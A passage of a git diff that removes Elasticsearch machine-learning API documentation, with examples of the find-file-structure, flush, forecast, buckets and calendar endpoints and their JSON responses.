00:46:42", - "count" : 9 - }, - { - "value" : "2018-06-01 01:03:22", - "count" : 9 - }, - { - "value" : "2018-06-01 01:05:13", - "count" : 9 - }, - { - "value" : "2018-06-01 00:11:20", - "count" : 8 - }, - { - "value" : "2018-06-01 00:16:03", - "count" : 8 - }, - { - "value" : "2018-06-01 00:19:47", - "count" : 8 - }, - { - "value" : "2018-06-01 00:25:17", - "count" : 8 - } - ] - }, - "tpep_pickup_datetime" : { - "count" : 19998, - "cardinality" : 8760, - "earliest" : "2018-05-31 06:08:31", - "latest" : "2018-06-02 01:21:21", - "top_hits" : [ - { - "value" : "2018-06-01 00:01:23", - "count" : 12 - }, - { - "value" : "2018-06-01 00:04:31", - "count" : 10 - }, - { - "value" : "2018-06-01 00:05:38", - "count" : 10 - }, - { - "value" : "2018-06-01 00:09:50", - "count" : 10 - }, - { - "value" : "2018-06-01 00:12:01", - "count" : 10 - }, - { - "value" : "2018-06-01 00:14:17", - "count" : 10 - }, - { - "value" : "2018-06-01 00:00:34", - "count" : 9 - }, - { - "value" : "2018-06-01 00:00:40", - "count" : 9 - }, - { - "value" : "2018-06-01 00:02:53", - "count" : 9 - }, - { - "value" : "2018-06-01 00:05:40", - "count" : 9 - } - ] - }, - "trip_distance" : { - "count" : 19998, - "cardinality" : 1687, - "min_value" : 0, - "max_value" : 64.63, - "mean_value" : 3.6521062106210715, - "median_value" : 2.16, - "top_hits" : [ - { - "value" : 0.9, - "count" : 335 - }, - { - "value" : 0.8, - "count" : 320 - }, - { - "value" : 1.1, - "count" : 316 - }, - { - "value" : 0.7, - "count" : 304 - }, - { - "value" : 1.2, - "count" : 303 - }, - { - "value" : 1, - "count" : 296 - }, - { - "value" : 1.3, - "count" : 280 - }, - { - "value" : 1.5, - "count" : 268 - }, - { - "value" : 1.6, - "count" : 268 - }, - { - "value" : 0.6, - "count" : 256 - } - ] - } - } -} ----- -// 
NOTCONSOLE - -<1> `num_messages_analyzed` is 2 lower than `num_lines_analyzed` because only - data records count as messages. The first line contains the column names - and in this sample the second line is blank. -<2> Unlike the first example, in this case the `format` has been identified as - `delimited`. -<3> Because the `format` is `delimited`, the `column_names` field in the output - lists the column names in the order they appear in the sample. -<4> `has_header_row` indicates that for this sample the column names were in - the first row of the sample. (If they hadn't been then it would have been - a good idea to specify them in the `column_names` query parameter.) -<5> The `delimiter` for this sample is a comma, as it's a CSV file. -<6> The `quote` character is the default double quote. (The structure finder - does not attempt to deduce any other quote character, so if you have a - delimited file that's quoted with some other character you must specify it - using the `quote` query parameter.) -<7> The `timestamp_field` has been chosen to be `tpep_pickup_datetime`. - `tpep_dropoff_datetime` would work just as well, but `tpep_pickup_datetime` - was chosen because it comes first in the column order. If you prefer - `tpep_dropoff_datetime` then force it to be chosen using the - `timestamp_field` query parameter. -<8> `joda_timestamp_formats` are used to tell Logstash how to parse timestamps. -<9> `java_timestamp_formats` are the Java time formats recognized in the time - fields. Elasticsearch mappings and Ingest pipeline use this format. -<10> The timestamp format in this sample doesn't specify a timezone, so to - accurately convert them to UTC timestamps to store in Elasticsearch it's - necessary to supply the timezone they relate to. `need_client_timezone` - will be `false` for timestamp formats that include the timezone. - - -[[ml-find-file-structure-example-timeout]] -=== Setting the timeout parameter - -If you try to analyze a lot of data then the analysis will take a long time. -If you want to limit the amount of processing your {es} cluster performs for -a request, use the `timeout` query parameter. The analysis will be aborted and -an error returned when the timeout expires. For example, you can replace 20000 -lines in the previous example with 200000 and set a 1 second timeout on the -analysis: - -[source,js] ----- -curl -s "s3.amazonaws.com/nyc-tlc/trip+data/yellow_tripdata_2018-06.csv" | head -200000 | curl -s -H "Content-Type: application/json" -XPOST "localhost:9200/_ml/find_file_structure?pretty&lines_to_sample=200000&timeout=1s" -T - ----- -// NOTCONSOLE -// Not converting to console because this shows how curl can be used - -Unless you are using an incredibly fast computer you'll receive a timeout error: - -[source,js] ----- -{ - "error" : { - "root_cause" : [ - { - "type" : "timeout_exception", - "reason" : "Aborting structure analysis during [delimited record parsing] as it has taken longer than the timeout of [1s]" - } - ], - "type" : "timeout_exception", - "reason" : "Aborting structure analysis during [delimited record parsing] as it has taken longer than the timeout of [1s]" - }, - "status" : 500 -} ----- -// NOTCONSOLE - --- -NOTE: If you try the example above yourself you will note that the overall -running time of the `curl` commands is considerably longer than 1 second. This -is because it takes a while to download 200000 lines of CSV from the internet, -and the timeout is measured from the time this endpoint starts to process the -data. 
--- - - -[[ml-find-file-structure-example-eslog]] -=== Analyzing {es} log files - -This is an example of analyzing {es}'s own log file: - -[source,js] ----- -curl -s -H "Content-Type: application/json" -XPOST "localhost:9200/_ml/find_file_structure?pretty" -T "$ES_HOME/logs/elasticsearch.log" ----- -// NOTCONSOLE -// Not converting to console because this shows how curl can be used - -If the request does not encounter errors, the result will look something like -this: - -[source,js] ----- -{ - "num_lines_analyzed" : 53, - "num_messages_analyzed" : 53, - "sample_start" : "[2018-09-27T14:39:28,518][INFO ][o.e.e.NodeEnvironment ] [node-0] using [1] data paths, mounts [[/ (/dev/disk1)]], net usable_space [165.4gb], net total_space [464.7gb], types [hfs]\n[2018-09-27T14:39:28,521][INFO ][o.e.e.NodeEnvironment ] [node-0] heap size [494.9mb], compressed ordinary object pointers [true]\n", - "charset" : "UTF-8", - "has_byte_order_marker" : false, - "format" : "semi_structured_text", <1> - "multiline_start_pattern" : "^\\[\\b\\d{4}-\\d{2}-\\d{2}[T ]\\d{2}:\\d{2}", <2> - "grok_pattern" : "\\[%{TIMESTAMP_ISO8601:timestamp}\\]\\[%{LOGLEVEL:loglevel}.*", <3> - "timestamp_field" : "timestamp", - "joda_timestamp_formats" : [ - "ISO8601" - ], - "java_timestamp_formats" : [ - "ISO8601" - ], - "need_client_timezone" : true, - "mappings" : { - "properties" : { - "@timestamp" : { - "type" : "date" - }, - "loglevel" : { - "type" : "keyword" - }, - "message" : { - "type" : "text" - } - } - }, - "ingest_pipeline" : { - "description" : "Ingest pipeline created by file structure finder", - "processors" : [ - { - "grok" : { - "field" : "message", - "patterns" : [ - "\\[%{TIMESTAMP_ISO8601:timestamp}\\]\\[%{LOGLEVEL:loglevel}.*" - ] - } - }, - { - "date" : { - "field" : "timestamp", - "timezone" : "{{ event.timezone }}", - "formats" : [ - "ISO8601" - ] - } - }, - { - "remove" : { - "field" : "timestamp" - } - } - ] - }, - "field_stats" : { - "loglevel" : { - "count" : 53, - "cardinality" : 3, - "top_hits" : [ - { - "value" : "INFO", - "count" : 51 - }, - { - "value" : "DEBUG", - "count" : 1 - }, - { - "value" : "WARN", - "count" : 1 - } - ] - }, - "timestamp" : { - "count" : 53, - "cardinality" : 28, - "earliest" : "2018-09-27T14:39:28,518", - "latest" : "2018-09-27T14:39:37,012", - "top_hits" : [ - { - "value" : "2018-09-27T14:39:29,859", - "count" : 10 - }, - { - "value" : "2018-09-27T14:39:29,860", - "count" : 9 - }, - { - "value" : "2018-09-27T14:39:29,858", - "count" : 6 - }, - { - "value" : "2018-09-27T14:39:28,523", - "count" : 3 - }, - { - "value" : "2018-09-27T14:39:34,234", - "count" : 2 - }, - { - "value" : "2018-09-27T14:39:28,518", - "count" : 1 - }, - { - "value" : "2018-09-27T14:39:28,521", - "count" : 1 - }, - { - "value" : "2018-09-27T14:39:28,522", - "count" : 1 - }, - { - "value" : "2018-09-27T14:39:29,861", - "count" : 1 - }, - { - "value" : "2018-09-27T14:39:32,786", - "count" : 1 - } - ] - } - } -} ----- -// NOTCONSOLE - -<1> This time the `format` has been identified as `semi_structured_text`. -<2> The `multiline_start_pattern` is set on the basis that the timestamp appears - in the first line of each multi-line log message. -<3> A very simple `grok_pattern` has been created, which extracts the timestamp - and recognizable fields that appear in every analyzed message. In this case - the only field that was recognized beyond the timestamp was the log level. 
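If you want to see how the generated `ingest_pipeline` would handle a real log line before you create it, one option (not part of the structure finder output itself) is the ingest simulate API. The sketch below copies the grok, date, and remove processors from the response above, drops the `timezone` setting (which relies on an `event.timezone` field that does not exist in a simulated document), and uses an abbreviated line from `sample_start` as the test document:

[source,console]
--------------------------------------------------
POST _ingest/pipeline/_simulate
{
  "pipeline": {
    "description": "Ingest pipeline created by file structure finder",
    "processors": [
      {
        "grok": {
          "field": "message",
          "patterns": [
            "\\[%{TIMESTAMP_ISO8601:timestamp}\\]\\[%{LOGLEVEL:loglevel}.*"
          ]
        }
      },
      {
        "date": {
          "field": "timestamp",
          "formats": [ "ISO8601" ]
        }
      },
      {
        "remove": {
          "field": "timestamp"
        }
      }
    ]
  },
  "docs": [
    {
      "_source": {
        "message": "[2018-09-27T14:39:28,518][INFO ][o.e.e.NodeEnvironment    ] [node-0] using [1] data paths"
      }
    }
  ]
}
--------------------------------------------------
// TEST[skip:illustration only]

The simulated document should come back with `loglevel` and `@timestamp` fields populated, which is a quick way to confirm the grok pattern behaves as expected on your own messages.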
- - -[[ml-find-file-structure-example-grok]] -=== Specifying `grok_pattern` as query parameter - -If you recognize more fields than the simple `grok_pattern` produced by the -structure finder unaided then you can resubmit the request specifying a more -advanced `grok_pattern` as a query parameter and the structure finder will -calculate `field_stats` for your additional fields. - -In the case of the {es} log a more complete Grok pattern is -`\[%{TIMESTAMP_ISO8601:timestamp}\]\[%{LOGLEVEL:loglevel} *\]\[%{JAVACLASS:class} *\] \[%{HOSTNAME:node}\] %{JAVALOGMESSAGE:message}`. -You can analyze the same log file again, submitting this `grok_pattern` as a -query parameter (appropriately URL escaped): - -[source,js] ----- -curl -s -H "Content-Type: application/json" -XPOST "localhost:9200/_ml/find_file_structure?pretty&format=semi_structured_text&grok_pattern=%5C%5B%25%7BTIMESTAMP_ISO8601:timestamp%7D%5C%5D%5C%5B%25%7BLOGLEVEL:loglevel%7D%20*%5C%5D%5C%5B%25%7BJAVACLASS:class%7D%20*%5C%5D%20%5C%5B%25%7BHOSTNAME:node%7D%5C%5D%20%25%7BJAVALOGMESSAGE:message%7D" -T "$ES_HOME/logs/elasticsearch.log" ----- -// NOTCONSOLE -// Not converting to console because this shows how curl can be used - -If the request does not encounter errors, the result will look something like -this: - -[source,js] ----- -{ - "num_lines_analyzed" : 53, - "num_messages_analyzed" : 53, - "sample_start" : "[2018-09-27T14:39:28,518][INFO ][o.e.e.NodeEnvironment ] [node-0] using [1] data paths, mounts [[/ (/dev/disk1)]], net usable_space [165.4gb], net total_space [464.7gb], types [hfs]\n[2018-09-27T14:39:28,521][INFO ][o.e.e.NodeEnvironment ] [node-0] heap size [494.9mb], compressed ordinary object pointers [true]\n", - "charset" : "UTF-8", - "has_byte_order_marker" : false, - "format" : "semi_structured_text", - "multiline_start_pattern" : "^\\[\\b\\d{4}-\\d{2}-\\d{2}[T ]\\d{2}:\\d{2}", - "grok_pattern" : "\\[%{TIMESTAMP_ISO8601:timestamp}\\]\\[%{LOGLEVEL:loglevel} *\\]\\[%{JAVACLASS:class} *\\] \\[%{HOSTNAME:node}\\] %{JAVALOGMESSAGE:message}", <1> - "timestamp_field" : "timestamp", - "joda_timestamp_formats" : [ - "ISO8601" - ], - "java_timestamp_formats" : [ - "ISO8601" - ], - "need_client_timezone" : true, - "mappings" : { - "properties" : { - "@timestamp" : { - "type" : "date" - }, - "class" : { - "type" : "keyword" - }, - "loglevel" : { - "type" : "keyword" - }, - "message" : { - "type" : "text" - }, - "node" : { - "type" : "keyword" - } - } - }, - "ingest_pipeline" : { - "description" : "Ingest pipeline created by file structure finder", - "processors" : [ - { - "grok" : { - "field" : "message", - "patterns" : [ - "\\[%{TIMESTAMP_ISO8601:timestamp}\\]\\[%{LOGLEVEL:loglevel} *\\]\\[%{JAVACLASS:class} *\\] \\[%{HOSTNAME:node}\\] %{JAVALOGMESSAGE:message}" - ] - } - }, - { - "date" : { - "field" : "timestamp", - "timezone" : "{{ event.timezone }}", - "formats" : [ - "ISO8601" - ] - } - }, - { - "remove" : { - "field" : "timestamp" - } - } - ] - }, - "field_stats" : { <2> - "class" : { - "count" : 53, - "cardinality" : 14, - "top_hits" : [ - { - "value" : "o.e.p.PluginsService", - "count" : 26 - }, - { - "value" : "o.e.c.m.MetadataIndexTemplateService", - "count" : 8 - }, - { - "value" : "o.e.n.Node", - "count" : 7 - }, - { - "value" : "o.e.e.NodeEnvironment", - "count" : 2 - }, - { - "value" : "o.e.a.ActionModule", - "count" : 1 - }, - { - "value" : "o.e.c.s.ClusterApplierService", - "count" : 1 - }, - { - "value" : "o.e.c.s.MasterService", - "count" : 1 - }, - { - "value" : "o.e.d.DiscoveryModule", - "count" : 1 - }, - { - 
"value" : "o.e.g.GatewayService", - "count" : 1 - }, - { - "value" : "o.e.l.LicenseService", - "count" : 1 - } - ] - }, - "loglevel" : { - "count" : 53, - "cardinality" : 3, - "top_hits" : [ - { - "value" : "INFO", - "count" : 51 - }, - { - "value" : "DEBUG", - "count" : 1 - }, - { - "value" : "WARN", - "count" : 1 - } - ] - }, - "message" : { - "count" : 53, - "cardinality" : 53, - "top_hits" : [ - { - "value" : "Using REST wrapper from plugin org.elasticsearch.xpack.security.Security", - "count" : 1 - }, - { - "value" : "adding template [.monitoring-alerts] for index patterns [.monitoring-alerts-6]", - "count" : 1 - }, - { - "value" : "adding template [.monitoring-beats] for index patterns [.monitoring-beats-6-*]", - "count" : 1 - }, - { - "value" : "adding template [.monitoring-es] for index patterns [.monitoring-es-6-*]", - "count" : 1 - }, - { - "value" : "adding template [.monitoring-kibana] for index patterns [.monitoring-kibana-6-*]", - "count" : 1 - }, - { - "value" : "adding template [.monitoring-logstash] for index patterns [.monitoring-logstash-6-*]", - "count" : 1 - }, - { - "value" : "adding template [.triggered_watches] for index patterns [.triggered_watches*]", - "count" : 1 - }, - { - "value" : "adding template [.watch-history-9] for index patterns [.watcher-history-9*]", - "count" : 1 - }, - { - "value" : "adding template [.watches] for index patterns [.watches*]", - "count" : 1 - }, - { - "value" : "starting ...", - "count" : 1 - } - ] - }, - "node" : { - "count" : 53, - "cardinality" : 1, - "top_hits" : [ - { - "value" : "node-0", - "count" : 53 - } - ] - }, - "timestamp" : { - "count" : 53, - "cardinality" : 28, - "earliest" : "2018-09-27T14:39:28,518", - "latest" : "2018-09-27T14:39:37,012", - "top_hits" : [ - { - "value" : "2018-09-27T14:39:29,859", - "count" : 10 - }, - { - "value" : "2018-09-27T14:39:29,860", - "count" : 9 - }, - { - "value" : "2018-09-27T14:39:29,858", - "count" : 6 - }, - { - "value" : "2018-09-27T14:39:28,523", - "count" : 3 - }, - { - "value" : "2018-09-27T14:39:34,234", - "count" : 2 - }, - { - "value" : "2018-09-27T14:39:28,518", - "count" : 1 - }, - { - "value" : "2018-09-27T14:39:28,521", - "count" : 1 - }, - { - "value" : "2018-09-27T14:39:28,522", - "count" : 1 - }, - { - "value" : "2018-09-27T14:39:29,861", - "count" : 1 - }, - { - "value" : "2018-09-27T14:39:32,786", - "count" : 1 - } - ] - } - } -} ----- -// NOTCONSOLE - -<1> The `grok_pattern` in the output is now the overridden one supplied in the - query parameter. -<2> The returned `field_stats` include entries for the fields from the - overridden `grok_pattern`. - -The URL escaping is hard, so if you are working interactively it is best to use -the {ml} UI! diff --git a/docs/reference/ml/anomaly-detection/apis/flush-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/flush-job.asciidoc deleted file mode 100644 index 0d72266f94a..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/flush-job.asciidoc +++ /dev/null @@ -1,114 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-flush-job]] -= Flush jobs API -++++ -Flush jobs -++++ - -Forces any buffered data to be processed by the job. - -[[ml-flush-job-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors//_flush` - -[[ml-flush-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. 
- -[[ml-flush-job-desc]] -== {api-description-title} - -The flush jobs API is only applicable when sending data for analysis using the -<>. Depending on the content of the buffer, then it -might additionally calculate new results. - -Both flush and close operations are similar, however the flush is more efficient -if you are expecting to send more data for analysis. When flushing, the job -remains open and is available to continue analyzing data. A close operation -additionally prunes and persists the model state to disk and the job must be -opened again before analyzing further data. - -[[ml-flush-job-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[ml-flush-job-query-parms]] -== {api-query-parms-title} - -`advance_time`:: - (string) Optional. Specifies to advance to a particular time value. Results are - generated and the model is updated for data from the specified time interval. - -`calc_interim`:: - (Boolean) Optional. If true, calculates the interim results for the most - recent bucket or all buckets within the latency period. - -`end`:: - (string) Optional. When used in conjunction with `calc_interim`, specifies the - range of buckets on which to calculate interim results. - -`skip_time`:: - (string) Optional. Specifies to skip to a particular time value. Results are - not generated and the model is not updated for data from the specified time - interval. - -`start`:: - (string) Optional. When used in conjunction with `calc_interim`, specifies the - range of buckets on which to calculate interim results. - -[[ml-flush-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/total-requests/_flush -{ - "calc_interim": true -} --------------------------------------------------- -// TEST[skip:setup:server_metrics_openjob] - -When the operation succeeds, you receive the following results: - -[source,console-result] ----- -{ - "flushed": true, - "last_finalized_bucket_end": 1455234900000 -} ----- -//TESTRESPONSE[s/"last_finalized_bucket_end": 1455234900000/"last_finalized_bucket_end": $body.last_finalized_bucket_end/] - -The `last_finalized_bucket_end` provides the timestamp (in -milliseconds-since-the-epoch) of the end of the last bucket that was processed. - -If you want to flush the job to a specific timestamp, you can use the -`advance_time` or `skip_time` parameters. For example, to advance to 11 AM GMT -on January 1, 2018: - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/total-requests/_flush -{ - "advance_time": "1514804400000" -} --------------------------------------------------- -// TEST[skip:setup:server_metrics_openjob] - -When the operation succeeds, you receive the following results: - -[source,console-result] ----- -{ - "flushed": true, - "last_finalized_bucket_end": 1514804400000 -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/forecast.asciidoc b/docs/reference/ml/anomaly-detection/apis/forecast.asciidoc deleted file mode 100644 index 2e92b278a9c..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/forecast.asciidoc +++ /dev/null @@ -1,95 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-forecast]] -= Forecast jobs API -++++ -Forecast jobs -++++ - -Predicts the future behavior of a time series by using its historical behavior. 
- -[[ml-forecast-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors//_forecast` - -[[ml-forecast-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-forecast-desc]] -== {api-description-title} - -You can create a forecast job based on an {anomaly-job} to extrapolate future -behavior. Refer to -{ml-docs}/ml-overview.html#ml-forecasting[Forecasting the future] and -{ml-docs}/ml-limitations.html#ml-forecast-limitations[forecast limitations] to -learn more. - -You can delete a forecast by using the -<>. - -[NOTE] -=============================== - -* If you use an `over_field_name` property in your job, you cannot create a -forecast. For more information about this property, see <>. -* The job must be open when you create a forecast. Otherwise, an error occurs. -=============================== - -[[ml-forecast-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[ml-forecast-request-body]] -== {api-request-body-title} - -`duration`:: - (Optional, <>) A period of time that indicates how far - into the future to forecast. For example, `30d` corresponds to 30 days. The - default value is 1 day. The forecast starts at the last record that was - processed. - -`expires_in`:: - (Optional, <>) The period of time that forecast - results are retained. After a forecast expires, the results are deleted. The - default value is 14 days. If set to a value of `0`, the forecast is never - automatically deleted. - -`max_model_memory`:: - (Optional, <>) The maximum memory the forecast can use. - If the forecast needs to use more than the provided amount, it will spool to - disk. Default is 20mb, maximum is 500mb and minimum is 1mb. If set to 40% or - more of the job's configured memory limit, it is automatically reduced to - below that amount. - -[[ml-forecast-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/total-requests/_forecast -{ - "duration": "10d" -} --------------------------------------------------- -// TEST[skip:requires delay] - -When the forecast is created, you receive the following results: -[source,js] ----- -{ - "acknowledged": true, - "forecast_id": "wkCWa2IB2lF8nSE_TzZo" -} ----- -// NOTCONSOLE - -You can subsequently see the forecast in the *Single Metric Viewer* in {kib}. - diff --git a/docs/reference/ml/anomaly-detection/apis/get-bucket.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-bucket.asciidoc deleted file mode 100644 index 77cc43738d9..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-bucket.asciidoc +++ /dev/null @@ -1,222 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-bucket]] -= Get buckets API -++++ -Get buckets -++++ - -Retrieves {anomaly-job} results for one or more buckets. - -[[ml-get-bucket-request]] -== {api-request-title} - -`GET _ml/anomaly_detectors//results/buckets` + - -`GET _ml/anomaly_detectors//results/buckets/` - -[[ml-get-bucket-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. You also -need `read` index privilege on the index that stores the results. The -`machine_learning_admin` and `machine_learning_user` roles provide these -privileges. 
For more information, see <>, -<>, and {ml-docs-setup-privileges}. - -[[ml-get-bucket-desc]] -== {api-description-title} - -The get buckets API presents a chronological view of the records, grouped by -bucket. - -[[ml-get-bucket-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -``:: -(Optional, string) The timestamp of a single bucket result. If you do not -specify this parameter, the API returns information about all buckets. - -[[ml-get-bucket-request-body]] -== {api-request-body-title} - -`anomaly_score`:: -(Optional, double) Returns buckets with anomaly scores greater or equal than -this value. - -`desc`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=desc-results] - -`end`:: -(Optional, string) Returns buckets with timestamps earlier than this time. - -`exclude_interim`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=exclude-interim-results] - -`expand`:: -(Optional, Boolean) If true, the output includes anomaly records. - -`page`.`from`:: -(Optional, integer) Skips the specified number of buckets. - -`page`.`size`:: -(Optional, integer) Specifies the maximum number of buckets to obtain. - -`sort`:: -(Optional, string) Specifies the sort field for the requested buckets. By -default, the buckets are sorted by the `timestamp` field. - -`start`:: -(Optional, string) Returns buckets with timestamps after this time. - -[role="child_attributes"] -[[ml-get-bucket-results]] -== {api-response-body-title} - -The API returns an array of bucket objects, which have the following properties: - -`anomaly_score`:: -(number) The maximum anomaly score, between 0-100, for any of the bucket -influencers. This is an overall, rate-limited score for the job. All the anomaly -records in the bucket contribute to this score. This value might be updated as -new data is analyzed. - -`bucket_influencers`:: -(array) An array of bucket influencer objects. -+ -.Properties of `bucket_influencers` -[%collapsible%open] -==== -`anomaly_score`::: -(number) A normalized score between 0-100, which is calculated for each bucket -influencer. This score might be updated as newer data is analyzed. - -`bucket_span`::: -(number) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-span-results] - -`initial_anomaly_score`::: -(number) The score between 0-100 for each bucket influencer. This score is the -initial value that was calculated at the time the bucket was processed. - -`influencer_field_name`::: -(string) The field name of the influencer. - -`influencer_field_value`::: -(string) The field value of the influencer. - -`is_interim`::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=is-interim] - -`job_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`probability`::: -(number) The probability that the bucket has this behavior, in the range 0 to 1. -This value can be held to a high precision of over 300 decimal places, so the -`anomaly_score` is provided as a human-readable and friendly interpretation of -this. - -`raw_anomaly_score`::: -(number) Internal. - -`result_type`::: -(string) Internal. This value is always set to `bucket_influencer`. - -`timestamp`::: -(date) The start time of the bucket for which these results were calculated. 
-==== - -`bucket_span`:: -(number) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-span-results] - -`event_count`:: -(number) The number of input data records processed in this bucket. - -`initial_anomaly_score`:: -(number) The maximum `anomaly_score` for any of the bucket influencers. This is -the initial value that was calculated at the time the bucket was processed. - -`is_interim`:: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=is-interim] - -`job_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`processing_time_ms`:: -(number) The amount of time, in milliseconds, that it took to analyze the bucket -contents and calculate results. - -`result_type`:: -(string) Internal. This value is always set to `bucket`. - -`timestamp`:: -(date) The start time of the bucket. This timestamp uniquely identifies the -bucket. -+ --- -NOTE: Events that occur exactly at the timestamp of the bucket are included in -the results for the bucket. - --- - -[[ml-get-bucket-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/low_request_rate/results/buckets -{ - "anomaly_score": 80, - "start": "1454530200001" -} --------------------------------------------------- -// TEST[skip:Kibana sample data] - -In this example, the API returns a single result that matches the specified -score and time constraints: -[source,js] ----- -{ - "count" : 1, - "buckets" : [ - { - "job_id" : "low_request_rate", - "timestamp" : 1578398400000, - "anomaly_score" : 91.58505459594764, - "bucket_span" : 3600, - "initial_anomaly_score" : 91.58505459594764, - "event_count" : 0, - "is_interim" : false, - "bucket_influencers" : [ - { - "job_id" : "low_request_rate", - "result_type" : "bucket_influencer", - "influencer_field_name" : "bucket_time", - "initial_anomaly_score" : 91.58505459594764, - "anomaly_score" : 91.58505459594764, - "raw_anomaly_score" : 0.5758246639716365, - "probability" : 1.7340849573442696E-4, - "timestamp" : 1578398400000, - "bucket_span" : 3600, - "is_interim" : false - } - ], - "processing_time_ms" : 0, - "result_type" : "bucket" - } - ] -} ----- \ No newline at end of file diff --git a/docs/reference/ml/anomaly-detection/apis/get-calendar-event.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-calendar-event.asciidoc deleted file mode 100644 index 3f3516f9e2c..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-calendar-event.asciidoc +++ /dev/null @@ -1,125 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-calendar-event]] -= Get scheduled events API -++++ -Get scheduled events -++++ - -Retrieves information about the scheduled events in calendars. - -[[ml-get-calendar-event-request]] -== {api-request-title} - -`GET _ml/calendars//events` + - -`GET _ml/calendars/_all/events` - -[[ml-get-calendar-event-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-get-calendar-event-desc]] -== {api-description-title} - -You can get scheduled event information for multiple calendars in a single -API request by using a comma-separated list of ids or a wildcard expression. -You can get scheduled event information for all calendars by using `_all`, -by specifying `*` as the ``, or by omitting the ``. 
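As a quick sketch of the wildcard forms described above, either of the following requests returns the scheduled events for every calendar:

[source,console]
--------------------------------------------------
GET _ml/calendars/_all/events

GET _ml/calendars/*/events
--------------------------------------------------
// TEST[skip:illustration only]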
- -For more information, see -{ml-docs}/ml-calendars.html[Calendars and scheduled events]. - -[[ml-get-calendar-event-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -[[ml-get-calendar-event-request-body]] -== {api-request-body-title} - -`end`:: -(Optional, string) Specifies to get events with timestamps earlier than this -time. - -`from`:: -(Optional, integer) Skips the specified number of events. - -`size`:: -(Optional, integer) Specifies the maximum number of events to obtain. - -`start`:: -(Optional, string) Specifies to get events with timestamps after this time. - -[[ml-get-calendar-event-results]] -== {api-response-body-title} - -The API returns an array of scheduled event resources, which have the -following properties: - -`calendar_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -`description`:: -(string) A description of the scheduled event. - -`end_time`:: -(date) The timestamp for the end of the scheduled event in milliseconds since -the epoch or ISO 8601 format. - -`event_id`:: -(string) An automatically-generated identifier for the scheduled event. - -`start_time`:: -(date) The timestamp for the beginning of the scheduled event in milliseconds -since the epoch or ISO 8601 format. - -[[ml-get-calendar-event-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/calendars/planned-outages/events --------------------------------------------------- -// TEST[skip:setup:calendar_outages_addevent] - -The API returns the following results: - -[source,console-result] ----- -{ - "count": 3, - "events": [ - { - "description": "event 1", - "start_time": 1513641600000, - "end_time": 1513728000000, - "calendar_id": "planned-outages", - "event_id": "LS8LJGEBMTCMA-qz49st" - }, - { - "description": "event 2", - "start_time": 1513814400000, - "end_time": 1513900800000, - "calendar_id": "planned-outages", - "event_id": "Li8LJGEBMTCMA-qz49st" - }, - { - "description": "event 3", - "start_time": 1514160000000, - "end_time": 1514246400000, - "calendar_id": "planned-outages", - "event_id": "Ly8LJGEBMTCMA-qz49st" - } - ] -} ----- -// TESTRESPONSE[s/LS8LJGEBMTCMA-qz49st/$body.$_path/] -// TESTRESPONSE[s/Li8LJGEBMTCMA-qz49st/$body.$_path/] -// TESTRESPONSE[s/Ly8LJGEBMTCMA-qz49st/$body.$_path/] diff --git a/docs/reference/ml/anomaly-detection/apis/get-calendar.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-calendar.asciidoc deleted file mode 100644 index 7b4e5bbe12b..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-calendar.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-calendar]] -= Get calendars API -++++ -Get calendars -++++ - -Retrieves configuration information for calendars. - -[[ml-get-calendar-request]] -== {api-request-title} - -`GET _ml/calendars/` + - -`GET _ml/calendars/_all` - 